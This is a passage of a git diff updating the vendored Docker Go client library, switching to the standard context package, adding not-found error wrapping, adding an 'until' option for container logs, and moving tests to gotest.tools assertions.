json.Marshal([]container.ContainerChangeResponseItem{ { Kind: 0, Path: "/path/1", diff --git a/vendor/github.com/docker/docker/client/container_exec.go b/vendor/github.com/docker/docker/client/container_exec.go index 0665c54fbd..535536b1e0 100644 --- a/vendor/github.com/docker/docker/client/container_exec.go +++ b/vendor/github.com/docker/docker/client/container_exec.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerExecCreate creates a new exec configuration to run an exec process. @@ -35,7 +35,7 @@ func (cli *Client) ContainerExecStart(ctx context.Context, execID string, config // It returns a types.HijackedConnection with the hijacked connection // and the a reader to get output. It's up to the called to close // the hijacked connection by calling types.HijackedResponse.Close. -func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) { +func (cli *Client) ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error) { headers := map[string][]string{"Content-Type": {"application/json"}} return cli.postHijacked(ctx, "/exec/"+execID+"/start", nil, config, headers) } diff --git a/vendor/github.com/docker/docker/client/container_exec_test.go b/vendor/github.com/docker/docker/client/container_exec_test.go index 0e296a50ad..68b900bf14 100644 --- a/vendor/github.com/docker/docker/client/container_exec_test.go +++ b/vendor/github.com/docker/docker/client/container_exec_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git 
a/vendor/github.com/docker/docker/client/container_export.go b/vendor/github.com/docker/docker/client/container_export.go index 52194f3d34..d0c0a5cbad 100644 --- a/vendor/github.com/docker/docker/client/container_export.go +++ b/vendor/github.com/docker/docker/client/container_export.go @@ -1,10 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - - "golang.org/x/net/context" ) // ContainerExport retrieves the raw contents of a container diff --git a/vendor/github.com/docker/docker/client/container_export_test.go b/vendor/github.com/docker/docker/client/container_export_test.go index 5849fe9252..8f6c8dce64 100644 --- a/vendor/github.com/docker/docker/client/container_export_test.go +++ b/vendor/github.com/docker/docker/client/container_export_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerExportError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_inspect.go b/vendor/github.com/docker/docker/client/container_inspect.go index 17f1809747..f453064cf8 100644 --- a/vendor/github.com/docker/docker/client/container_inspect.go +++ b/vendor/github.com/docker/docker/client/container_inspect.go @@ -1,24 +1,23 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerInspect returns the container information. 
func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (types.ContainerJSON, error) { + if containerID == "" { + return types.ContainerJSON{}, objectNotFoundError{object: "container", id: containerID} + } serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return types.ContainerJSON{}, containerNotFoundError{containerID} - } - return types.ContainerJSON{}, err + return types.ContainerJSON{}, wrapResponseError(err, serverResp, "container", containerID) } var response types.ContainerJSON @@ -29,16 +28,16 @@ func (cli *Client) ContainerInspect(ctx context.Context, containerID string) (ty // ContainerInspectWithRaw returns the container information and its raw representation. func (cli *Client) ContainerInspectWithRaw(ctx context.Context, containerID string, getSize bool) (types.ContainerJSON, []byte, error) { + if containerID == "" { + return types.ContainerJSON{}, nil, objectNotFoundError{object: "container", id: containerID} + } query := url.Values{} if getSize { query.Set("size", "1") } serverResp, err := cli.get(ctx, "/containers/"+containerID+"/json", query, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return types.ContainerJSON{}, nil, containerNotFoundError{containerID} - } - return types.ContainerJSON{}, nil, err + return types.ContainerJSON{}, nil, wrapResponseError(err, serverResp, "container", containerID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/container_inspect_test.go b/vendor/github.com/docker/docker/client/container_inspect_test.go index f1a6f4ac7d..92a77f6aea 100644 --- a/vendor/github.com/docker/docker/client/container_inspect_test.go +++ b/vendor/github.com/docker/docker/client/container_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" 
"io/ioutil" @@ -10,7 +11,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestContainerInspectError(t *testing.T) { @@ -30,11 +31,23 @@ func TestContainerInspectContainerNotFound(t *testing.T) { } _, err := client.ContainerInspect(context.Background(), "unknown") - if err == nil || !IsErrContainerNotFound(err) { + if err == nil || !IsErrNotFound(err) { t.Fatalf("expected a containerNotFound error, got %v", err) } } +func TestContainerInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ContainerInspectWithRaw(context.Background(), "", true) + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestContainerInspect(t *testing.T) { expectedURL := "/containers/container_id/json" client := &Client{ @@ -67,10 +80,10 @@ func TestContainerInspect(t *testing.T) { t.Fatalf("expected `container_id`, got %s", r.ID) } if r.Image != "image" { - t.Fatalf("expected `image`, got %s", r.ID) + t.Fatalf("expected `image`, got %s", r.Image) } if r.Name != "name" { - t.Fatalf("expected `name`, got %s", r.ID) + t.Fatalf("expected `name`, got %s", r.Name) } } @@ -107,10 +120,10 @@ func TestContainerInspectNode(t *testing.T) { t.Fatalf("expected `container_id`, got %s", r.ID) } if r.Image != "image" { - t.Fatalf("expected `image`, got %s", r.ID) + t.Fatalf("expected `image`, got %s", r.Image) } if r.Name != "name" { - t.Fatalf("expected `name`, got %s", r.ID) + t.Fatalf("expected `name`, got %s", r.Name) } if r.Node.ID != "container_node_id" { t.Fatalf("expected `container_node_id`, got %s", r.Node.ID) diff --git a/vendor/github.com/docker/docker/client/container_kill.go b/vendor/github.com/docker/docker/client/container_kill.go index 29f80c73ad..4d6f1d23da 100644 --- 
a/vendor/github.com/docker/docker/client/container_kill.go +++ b/vendor/github.com/docker/docker/client/container_kill.go @@ -1,9 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - - "golang.org/x/net/context" ) // ContainerKill terminates the container process but does not remove the container from the docker host. diff --git a/vendor/github.com/docker/docker/client/container_kill_test.go b/vendor/github.com/docker/docker/client/container_kill_test.go index 9477b0abd2..85bb5ee559 100644 --- a/vendor/github.com/docker/docker/client/container_kill_test.go +++ b/vendor/github.com/docker/docker/client/container_kill_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerKillError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_list.go b/vendor/github.com/docker/docker/client/container_list.go index 4398912197..9c218e2218 100644 --- a/vendor/github.com/docker/docker/client/container_list.go +++ b/vendor/github.com/docker/docker/client/container_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strconv" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // ContainerList returns the list of containers in the docker host. 
diff --git a/vendor/github.com/docker/docker/client/container_list_test.go b/vendor/github.com/docker/docker/client/container_list_test.go index e41c6874b5..809f20f5c7 100644 --- a/vendor/github.com/docker/docker/client/container_list_test.go +++ b/vendor/github.com/docker/docker/client/container_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) func TestContainerListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_logs.go b/vendor/github.com/docker/docker/client/container_logs.go index 69056b6321..5b6541f035 100644 --- a/vendor/github.com/docker/docker/client/container_logs.go +++ b/vendor/github.com/docker/docker/client/container_logs.go @@ -1,18 +1,38 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" timetypes "github.com/docker/docker/api/types/time" + "github.com/pkg/errors" ) // ContainerLogs returns the logs generated by a container in an io.ReadCloser. // It's up to the caller to close the stream. +// +// The stream format on the response will be in one of two formats: +// +// If the container is using a TTY, there is only a single stream (stdout), and +// data is copied directly from the container output stream, no extra +// multiplexing or headers. +// +// If the container is *not* using a TTY, streams for stdout and stderr are +// multiplexed. +// The format of the multiplexed stream is as follows: +// +// [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}[]byte{OUTPUT} +// +// STREAM_TYPE can be 1 for stdout and 2 for stderr +// +// SIZE1, SIZE2, SIZE3, and SIZE4 are four bytes of uint32 encoded as big endian. 
+// This is the size of OUTPUT. +// +// You can use github.com/docker/docker/pkg/stdcopy.StdCopy to demultiplex this +// stream. func (cli *Client) ContainerLogs(ctx context.Context, container string, options types.ContainerLogsOptions) (io.ReadCloser, error) { query := url.Values{} if options.ShowStdout { @@ -26,11 +46,19 @@ func (cli *Client) ContainerLogs(ctx context.Context, container string, options if options.Since != "" { ts, err := timetypes.GetTimestamp(options.Since, time.Now()) if err != nil { - return nil, err + return nil, errors.Wrap(err, `invalid value for "since"`) } query.Set("since", ts) } + if options.Until != "" { + ts, err := timetypes.GetTimestamp(options.Until, time.Now()) + if err != nil { + return nil, errors.Wrap(err, `invalid value for "until"`) + } + query.Set("until", ts) + } + if options.Timestamps { query.Set("timestamps", "1") } @@ -46,7 +74,7 @@ func (cli *Client) ContainerLogs(ctx context.Context, container string, options resp, err := cli.get(ctx, "/containers/"+container+"/logs", query, nil) if err != nil { - return nil, err + return nil, wrapResponseError(err, resp, "container", container) } return resp.body, nil } diff --git a/vendor/github.com/docker/docker/client/container_logs_test.go b/vendor/github.com/docker/docker/client/container_logs_test.go index 99e31842c9..6d6e34e101 100644 --- a/vendor/github.com/docker/docker/client/container_logs_test.go +++ b/vendor/github.com/docker/docker/client/container_logs_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io" "io/ioutil" @@ -13,24 +14,34 @@ import ( "time" "github.com/docker/docker/api/types" - - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) +func TestContainerLogsNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Not found")), + } + _, err := client.ContainerLogs(context.Background(), 
"container_id", types.ContainerLogsOptions{}) + if !IsErrNotFound(err) { + t.Fatalf("expected a not found error, got %v", err) + } +} + func TestContainerLogsError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } _, err := client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) _, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{ Since: "2006-01-02TZ", }) - if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { - t.Fatalf("expected a 'parsing time' error, got %v", err) - } + assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`)) + _, err = client.ContainerLogs(context.Background(), "container_id", types.ContainerLogsOptions{ + Until: "2006-01-02TZ", + }) + assert.Check(t, is.ErrorContains(err, `parsing time "2006-01-02TZ"`)) } func TestContainerLogs(t *testing.T) { @@ -38,6 +49,7 @@ func TestContainerLogs(t *testing.T) { cases := []struct { options types.ContainerLogsOptions expectedQueryParams map[string]string + expectedError string }{ { expectedQueryParams: map[string]string{ @@ -71,21 +83,44 @@ func TestContainerLogs(t *testing.T) { }, { options: types.ContainerLogsOptions{ - // An complete invalid date, timestamp or go duration will be - // passed as is - Since: "invalid but valid", + // timestamp will be passed as is + Since: "1136073600.000000001", + }, + expectedQueryParams: map[string]string{ + "tail": "", + "since": "1136073600.000000001", + }, + }, + { + options: types.ContainerLogsOptions{ + // timestamp will be passed as is + Until: "1136073600.000000001", }, expectedQueryParams: map[string]string{ "tail": "", - "since": "invalid but valid", + "until": 
"1136073600.000000001", + }, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date will not be passed + Since: "invalid value", }, + expectedError: `invalid value for "since": failed to parse value as time or duration: "invalid value"`, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date will not be passed + Until: "invalid value", + }, + expectedError: `invalid value for "until": failed to parse value as time or duration: "invalid value"`, }, } for _, logCase := range cases { client := &Client{ client: newMockClient(func(r *http.Request) (*http.Response, error) { if !strings.HasPrefix(r.URL.Path, expectedURL) { - return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, r.URL) } // Check query parameters query := r.URL.Query() @@ -102,17 +137,15 @@ func TestContainerLogs(t *testing.T) { }), } body, err := client.ContainerLogs(context.Background(), "container_id", logCase.options) - if err != nil { - t.Fatal(err) + if logCase.expectedError != "" { + assert.Check(t, is.Error(err, logCase.expectedError)) + continue } + assert.NilError(t, err) defer body.Close() content, err := ioutil.ReadAll(body) - if err != nil { - t.Fatal(err) - } - if string(content) != "response" { - t.Fatalf("expected response to contain 'response', got %s", string(content)) - } + assert.NilError(t, err) + assert.Check(t, is.Contains(string(content), "response")) } } diff --git a/vendor/github.com/docker/docker/client/container_pause.go b/vendor/github.com/docker/docker/client/container_pause.go index 412067a782..5e7271a371 100644 --- a/vendor/github.com/docker/docker/client/container_pause.go +++ b/vendor/github.com/docker/docker/client/container_pause.go @@ -1,6 +1,6 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // ContainerPause pauses the main process of a given container 
without terminating it. func (cli *Client) ContainerPause(ctx context.Context, containerID string) error { diff --git a/vendor/github.com/docker/docker/client/container_pause_test.go b/vendor/github.com/docker/docker/client/container_pause_test.go index 0ee2f05d7e..d1f73a67f3 100644 --- a/vendor/github.com/docker/docker/client/container_pause_test.go +++ b/vendor/github.com/docker/docker/client/container_pause_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerPauseError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_prune.go b/vendor/github.com/docker/docker/client/container_prune.go index b582170867..14f88d93ba 100644 --- a/vendor/github.com/docker/docker/client/container_prune.go +++ b/vendor/github.com/docker/docker/client/container_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // ContainersPrune requests the daemon to delete unused data diff --git a/vendor/github.com/docker/docker/client/container_prune_test.go b/vendor/github.com/docker/docker/client/container_prune_test.go new file mode 100644 index 0000000000..6a830d01dc --- /dev/null +++ b/vendor/github.com/docker/docker/client/container_prune_test.go @@ -0,0 +1,125 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestContainersPruneError(t *testing.T) { + client := &Client{ + client: 
newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + } + + filters := filters.NewArgs() + + _, err := client.ContainersPrune(context.Background(), filters) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestContainersPrune(t *testing.T) { + expectedURL := "/v1.25/containers/prune" + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + danglingUntilFilters := filters.NewArgs() + danglingUntilFilters.Add("dangling", "true") + danglingUntilFilters.Add("until", "2016-12-15T14:00") + + labelFilters := filters.NewArgs() + labelFilters.Add("dangling", "true") + labelFilters.Add("label", "label1=foo") + labelFilters.Add("label", "label2!=bar") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.Args{}, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": "", + }, + }, + { + filters: danglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true}}`, + }, + }, + { + filters: danglingUntilFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"until":{"2016-12-15T14:00":true}}`, + }, + }, + { + filters: noDanglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + { + filters: labelFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, 
fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + assert.Check(t, is.Equal(expected, actual)) + } + content, err := json.Marshal(types.ContainersPruneReport{ + ContainersDeleted: []string{"container_id1", "container_id2"}, + SpaceReclaimed: 9999, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.25", + } + + report, err := client.ContainersPrune(context.Background(), listCase.filters) + assert.Check(t, err) + assert.Check(t, is.Len(report.ContainersDeleted, 2)) + assert.Check(t, is.Equal(uint64(9999), report.SpaceReclaimed)) + } +} diff --git a/vendor/github.com/docker/docker/client/container_remove.go b/vendor/github.com/docker/docker/client/container_remove.go index 3a79590ced..ab4cfc16f8 100644 --- a/vendor/github.com/docker/docker/client/container_remove.go +++ b/vendor/github.com/docker/docker/client/container_remove.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerRemove kills and removes a container from the docker host. 
@@ -23,5 +23,5 @@ func (cli *Client) ContainerRemove(ctx context.Context, containerID string, opti resp, err := cli.delete(ctx, "/containers/"+containerID, query, nil) ensureReaderClosed(resp) - return err + return wrapResponseError(err, resp, "container", containerID) } diff --git a/vendor/github.com/docker/docker/client/container_remove_test.go b/vendor/github.com/docker/docker/client/container_remove_test.go index 798c08b333..d94d831304 100644 --- a/vendor/github.com/docker/docker/client/container_remove_test.go +++ b/vendor/github.com/docker/docker/client/container_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,8 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestContainerRemoveError(t *testing.T) { @@ -17,9 +19,16 @@ func TestContainerRemoveError(t *testing.T) { client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestContainerRemoveNotFoundError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } + err := client.ContainerRemove(context.Background(), "container_id", types.ContainerRemoveOptions{}) + assert.Check(t, is.Error(err, "Error: No such container: container_id")) + assert.Check(t, IsErrNotFound(err)) } func TestContainerRemove(t *testing.T) { @@ -53,7 +62,5 @@ func TestContainerRemove(t *testing.T) { RemoveVolumes: true, Force: true, }) - if err != nil { - t.Fatal(err) - } + assert.Check(t, err) } diff --git 
a/vendor/github.com/docker/docker/client/container_rename.go b/vendor/github.com/docker/docker/client/container_rename.go index 0e718da7c6..240fdf552b 100644 --- a/vendor/github.com/docker/docker/client/container_rename.go +++ b/vendor/github.com/docker/docker/client/container_rename.go @@ -1,9 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - - "golang.org/x/net/context" ) // ContainerRename changes the name of a given container. diff --git a/vendor/github.com/docker/docker/client/container_rename_test.go b/vendor/github.com/docker/docker/client/container_rename_test.go index 732ebff5f7..42be609028 100644 --- a/vendor/github.com/docker/docker/client/container_rename_test.go +++ b/vendor/github.com/docker/docker/client/container_rename_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerRenameError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_resize.go b/vendor/github.com/docker/docker/client/container_resize.go index 66c3cc1940..a9d4c0c79a 100644 --- a/vendor/github.com/docker/docker/client/container_resize.go +++ b/vendor/github.com/docker/docker/client/container_resize.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "strconv" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerResize changes the size of the tty for a container. 
diff --git a/vendor/github.com/docker/docker/client/container_resize_test.go b/vendor/github.com/docker/docker/client/container_resize_test.go index 5b2efecdce..3c10fd7e69 100644 --- a/vendor/github.com/docker/docker/client/container_resize_test.go +++ b/vendor/github.com/docker/docker/client/container_resize_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,7 +10,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestContainerResizeError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_restart.go b/vendor/github.com/docker/docker/client/container_restart.go index 74d7455f02..41e421969f 100644 --- a/vendor/github.com/docker/docker/client/container_restart.go +++ b/vendor/github.com/docker/docker/client/container_restart.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "time" timetypes "github.com/docker/docker/api/types/time" - "golang.org/x/net/context" ) // ContainerRestart stops and starts a container again. 
diff --git a/vendor/github.com/docker/docker/client/container_restart_test.go b/vendor/github.com/docker/docker/client/container_restart_test.go index 8c3cfd6a6f..27e81da5d8 100644 --- a/vendor/github.com/docker/docker/client/container_restart_test.go +++ b/vendor/github.com/docker/docker/client/container_restart_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" "time" - - "golang.org/x/net/context" ) func TestContainerRestartError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_start.go b/vendor/github.com/docker/docker/client/container_start.go index b1f08de416..c2e0b15dca 100644 --- a/vendor/github.com/docker/docker/client/container_start.go +++ b/vendor/github.com/docker/docker/client/container_start.go @@ -1,10 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/container_start_test.go b/vendor/github.com/docker/docker/client/container_start_test.go index 5826fa8bc7..277c585caa 100644 --- a/vendor/github.com/docker/docker/client/container_start_test.go +++ b/vendor/github.com/docker/docker/client/container_start_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/container_stats.go b/vendor/github.com/docker/docker/client/container_stats.go index 4758c66e32..6ef44c7748 100644 --- a/vendor/github.com/docker/docker/client/container_stats.go +++ b/vendor/github.com/docker/docker/client/container_stats.go @@ -1,10 +1,10 @@ -package client +package 
client // import "github.com/docker/docker/client" import ( + "context" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ContainerStats returns near realtime stats for a given container. diff --git a/vendor/github.com/docker/docker/client/container_stats_test.go b/vendor/github.com/docker/docker/client/container_stats_test.go index 7414f135c3..d88596315c 100644 --- a/vendor/github.com/docker/docker/client/container_stats_test.go +++ b/vendor/github.com/docker/docker/client/container_stats_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerStatsError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_stop.go b/vendor/github.com/docker/docker/client/container_stop.go index b5418ae8c8..629d7ab64c 100644 --- a/vendor/github.com/docker/docker/client/container_stop.go +++ b/vendor/github.com/docker/docker/client/container_stop.go @@ -1,15 +1,20 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "net/url" "time" timetypes "github.com/docker/docker/api/types/time" - "golang.org/x/net/context" ) -// ContainerStop stops a container without terminating the process. -// The process is blocked until the container stops or the timeout expires. +// ContainerStop stops a container. In case the container fails to stop +// gracefully within a time frame specified by the timeout argument, +// it is forcefully terminated (killed). +// +// If the timeout is nil, the container's StopTimeout value is used, if set, +// otherwise the engine default. A negative timeout value can be specified, +// meaning no timeout, i.e. no forceful termination is performed. 
func (cli *Client) ContainerStop(ctx context.Context, containerID string, timeout *time.Duration) error { query := url.Values{} if timeout != nil { diff --git a/vendor/github.com/docker/docker/client/container_stop_test.go b/vendor/github.com/docker/docker/client/container_stop_test.go index c32cd691c4..e9af74525a 100644 --- a/vendor/github.com/docker/docker/client/container_stop_test.go +++ b/vendor/github.com/docker/docker/client/container_stop_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" "time" - - "golang.org/x/net/context" ) func TestContainerStopError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_top.go b/vendor/github.com/docker/docker/client/container_top.go index 4e7270ea22..9c9fce7a04 100644 --- a/vendor/github.com/docker/docker/client/container_top.go +++ b/vendor/github.com/docker/docker/client/container_top.go @@ -1,17 +1,17 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "strings" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) // ContainerTop shows process information from within a container. 
-func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (types.ContainerProcessList, error) { - var response types.ContainerProcessList +func (cli *Client) ContainerTop(ctx context.Context, containerID string, arguments []string) (container.ContainerTopOKBody, error) { + var response container.ContainerTopOKBody query := url.Values{} if len(arguments) > 0 { query.Set("ps_args", strings.Join(arguments, " ")) diff --git a/vendor/github.com/docker/docker/client/container_top_test.go b/vendor/github.com/docker/docker/client/container_top_test.go index 7802be063e..48daba7783 100644 --- a/vendor/github.com/docker/docker/client/container_top_test.go +++ b/vendor/github.com/docker/docker/client/container_top_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,8 +11,7 @@ import ( "strings" "testing" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/container" ) func TestContainerTopError(t *testing.T) { @@ -43,7 +43,7 @@ func TestContainerTop(t *testing.T) { return nil, fmt.Errorf("args not set in URL query properly. 
Expected 'arg1 arg2', got %v", args) } - b, err := json.Marshal(types.ContainerProcessList{ + b, err := json.Marshal(container.ContainerTopOKBody{ Processes: [][]string{ {"p1", "p2"}, {"p3"}, diff --git a/vendor/github.com/docker/docker/client/container_unpause.go b/vendor/github.com/docker/docker/client/container_unpause.go index 5c76211256..1d8f873169 100644 --- a/vendor/github.com/docker/docker/client/container_unpause.go +++ b/vendor/github.com/docker/docker/client/container_unpause.go @@ -1,6 +1,6 @@ -package client +package client // import "github.com/docker/docker/client" -import "golang.org/x/net/context" +import "context" // ContainerUnpause resumes the process execution within a container func (cli *Client) ContainerUnpause(ctx context.Context, containerID string) error { diff --git a/vendor/github.com/docker/docker/client/container_unpause_test.go b/vendor/github.com/docker/docker/client/container_unpause_test.go index 2c42727191..000699190a 100644 --- a/vendor/github.com/docker/docker/client/container_unpause_test.go +++ b/vendor/github.com/docker/docker/client/container_unpause_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestContainerUnpauseError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/container_update.go b/vendor/github.com/docker/docker/client/container_update.go index 5082f22dfa..14e7f23dfb 100644 --- a/vendor/github.com/docker/docker/client/container_update.go +++ b/vendor/github.com/docker/docker/client/container_update.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" 